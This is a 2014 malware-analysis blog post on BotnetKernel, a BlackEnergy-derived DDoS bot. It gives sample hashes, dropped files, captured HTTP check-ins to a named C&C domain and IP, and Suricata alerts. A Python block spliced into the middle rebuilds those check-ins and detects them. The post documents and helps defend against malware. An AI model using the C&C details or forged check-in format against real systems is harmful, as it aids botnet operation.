2014-06-21 - DDoS

BotnetKernel (MS:Win32/Phdet.S) an evolution of BlackEnergy



I didn't find any advert for what seems to be an evolution of the DDoS bot/botnet BlackEnergy (Microsoft: Backdoor:Win32/Phdet.S): BotnetKernel Bot.

Here is a C&C panel:

BotnetKernel C&C Panel: Control
BotnetKernel C&C Panel: Control - Stats by Countries
BotnetKernel C&C Panel: Control - Stats by Builds
BotnetKernel C&C Panel: Plugins
BotnetKernel C&C Panel: Plugins config: ddos
BotnetKernel C&C Panel: Plugins config: http
BotnetKernel C&C Panel: Plugins config: slow
BotnetKernel C&C Panel: bot list
BotnetKernel C&C Panel: bot list - Search (FR) - Cmd and Cfg on a bot
A sample (7626a97642e27b13d2d8a021661099f7) I met was pushed as a task inside an Andromeda (yes, the same Andromeda botnet that was pushing Neutrino bot).

Sandboxing it:


Force reboot captured by Cuckoo Sandbox
Dropped:
C:\WINDOWS\system32\drivers\nethost.sys - f4827d3fc17af67f390b59f5ed04622c
C:\WINDOWS\system32\DLL1.tmp

Traffic (pcap at the end):

http://nav555asto.mcdir.ru/ya/getcfg.php
POST /ya/getcfg.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en)
Host: nav555asto.mcdir.ru
Content-Length: 101
Cache-Control: no-cache

hyrf=ZcHUXPhRjZgrcaXeLjNBeXq7YXPCO+9rXBJeQ53QARj24lQoxyWAfjRknTKsWfo2eDIxWwz2Feb+IjnjkAEG88MaS4L01pSq
http://nav555asto.mcdir.ru/ya/getcfg.php
POST /ya/getcfg.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en)
Host: nav555asto.mcdir.ru
Content-Length: 118
Cache-Control: no-cache

nslaf=a8Cdb/EG37VtEv6KJklCcgjNF3TJOpsTUhxYQ+mrDRqFkSk48SyGYW05kmWGWe1ldEEOE1/nRvKrfDSQoU4Mus0ZU4Lx3sf3L0LM0gyKQzYiQw==
http://nav555asto.mcdir.ru/ya/getcfg.php
POST /ya/getcfg.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en)
Host: nav555asto.mcdir.ru
Content-Length: 116
Cache-Control: no-cache

zkn=a8Cdb/EKz65uEv6KJklCcgjNF3TJOpsTUhxYQ+mrDRqFkSk48SyGYW05kmWGWe1ldEEOE1/nRvKrfDSQoU4Mus0ZU4Lx3sf3L0LM0gyKQzYiQw==
http://nav555asto.mcdir.ru/ya/getcfg.php
POST /ya/getcfg.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en)
Host: nav555asto.mcdir.ru
Content-Length: 116
Cache-Control: no-cache

oeh=a8Cdb/ER17VpEv6KJklCcgjNF3TJOpsTUhxYQ+mrDRqFkSk48SyGYW05kmWGWe1ldEEOE1/nRvKrfDSQoU4Mus0ZU4Lx3sf3L0LM0gyKQzYiQw==
which fires the following ET Pro rule in Suricata:

06/21/2014-03:45:49.765657 [**] [1:2807793:2] ETPRO TROJAN Win32/Rootkit.BlackEnergy.AG Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.1.31:1072 -> 91.194.254.180:80
06/21/2014-03:45:47.325018 [**] [1:2807793:2] ETPRO TROJAN Win32/Rootkit.BlackEnergy.AG Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.1.31:1070 -> 91.194.254.180:80
06/21/2014-03:45:48.563590 [**] [1:2807793:2] ETPRO TROJAN Win32/Rootkit.BlackEnergy.AG Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.1.31:1071 -> 91.194.254.180:80
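The check-ins above share one shape: a POST to getcfg.php, that fixed MSIE 6.0 User-Agent, Cache-Control: no-cache, and a body made of a single short random key carrying one base64 blob. As an added example (not part of the original post, and not the ET Pro rule itself), the Python below applies that shape to raw HTTP requests; the four captured bodies are reused as constructed sample input, while the benign request, the host default and every function name are assumptions.

```python
import base64
import binascii
import re

# Header values are those of the capture above; the bodies are the four posted blobs.
CHECKIN_UA = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en)"
BODY_RE = re.compile(r"^([a-z]{2,8})=([A-Za-z0-9+/]+={0,2})$")  # one random key, one blob
CAPTURED_BODIES = [
    ("hyrf", "ZcHUXPhRjZgrcaXeLjNBeXq7YXPCO+9rXBJeQ53QARj24lQoxyWAfjRknTKsWfo2eDIxWwz2Feb+IjnjkAEG88MaS4L01pSq"),
    ("nslaf", "a8Cdb/EG37VtEv6KJklCcgjNF3TJOpsTUhxYQ+mrDRqFkSk48SyGYW05kmWGWe1ldEEOE1/nRvKrfDSQoU4Mus0ZU4Lx3sf3L0LM0gyKQzYiQw=="),
    ("zkn", "a8Cdb/EKz65uEv6KJklCcgjNF3TJOpsTUhxYQ+mrDRqFkSk48SyGYW05kmWGWe1ldEEOE1/nRvKrfDSQoU4Mus0ZU4Lx3sf3L0LM0gyKQzYiQw=="),
    ("oeh", "a8Cdb/ER17VpEv6KJklCcgjNF3TJOpsTUhxYQ+mrDRqFkSk48SyGYW05kmWGWe1ldEEOE1/nRvKrfDSQoU4Mus0ZU4Lx3sf3L0LM0gyKQzYiQw=="),
]
# Constructed ordinary form post that must not be flagged (assumption, not from the pcap).
BENIGN = "POST /login HTTP/1.1\r\nHost: example.test\r\nUser-Agent: curl/7.64.0\r\nContent-Length: 14\r\n\r\nuser=a&pass=bb"

def make_sample_request(param, value, host="nav555asto.mcdir.ru"):
    """Test fixture: rebuild a captured check-in in the exact header layout seen in the pcap."""
    body = f"{param}={value}"
    return (f"POST /ya/getcfg.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\n"
            f"User-Agent: {CHECKIN_UA}\r\nHost: {host}\r\nContent-Length: {len(body)}\r\n"
            f"Cache-Control: no-cache\r\n\r\n{body}")

def parse_request(raw):
    """Split a raw HTTP/1.x request into (method, path, lower-cased headers, body)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    request_line, *header_lines = head.split("\n")
    method, path, _ = request_line.split(" ", 2)
    headers = {k.strip().lower(): v.strip() for k, _, v in (h.partition(":") for h in header_lines)}
    return method, path, headers, body.strip()

def classify_checkin(raw):
    """Return a finding for a request shaped like the getcfg.php check-in, else None."""
    method, path, headers, body = parse_request(raw)
    if method != "POST" or not path.endswith("/getcfg.php"):
        return None
    if headers.get("user-agent") != CHECKIN_UA or headers.get("cache-control", "").lower() != "no-cache":
        return None
    m = BODY_RE.match(body)
    if not m:
        return None
    try:
        blob = base64.b64decode(m.group(2), validate=True)  # opaque, encrypted bot payload
    except binascii.Error:
        return None
    return {"host": headers.get("host"), "param": m.group(1), "decoded_len": len(blob),
            "length_ok": headers.get("content-length") == str(len(body))}

def scan(requests):  # keep only the hits
    return [f for f in map(classify_checkin, requests) if f]
```

The random parameter name is the part a naive content match trips on, which is why the check keys on the fixed headers and the body shape rather than on the key.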
Files: multiple BotnetKernel bot samples, pcap, dropped driver

Read more:
BlackEnergy Rootkit, Sort Of - 2014-06-13 - F-Secure
New variant of the Phdet.s rootkit, hard to detect!!! - 2014-03-04 - SatInfo
MSRT December '12 - Phdet - 2012-12-11 - Scott Molenkamp - Microsoft
BlackEnergy Version 2 Analysis - 2010-03-10 - Joe Stewart - Dell SecureWorks
Updated BlackEnergy DDoS Botnet Kit - 2010-01-18 - Dell
BlackEnergy DDoS Bot Analysis (PDF) - 2007-10 - Jose Nazario - Arbor ASERT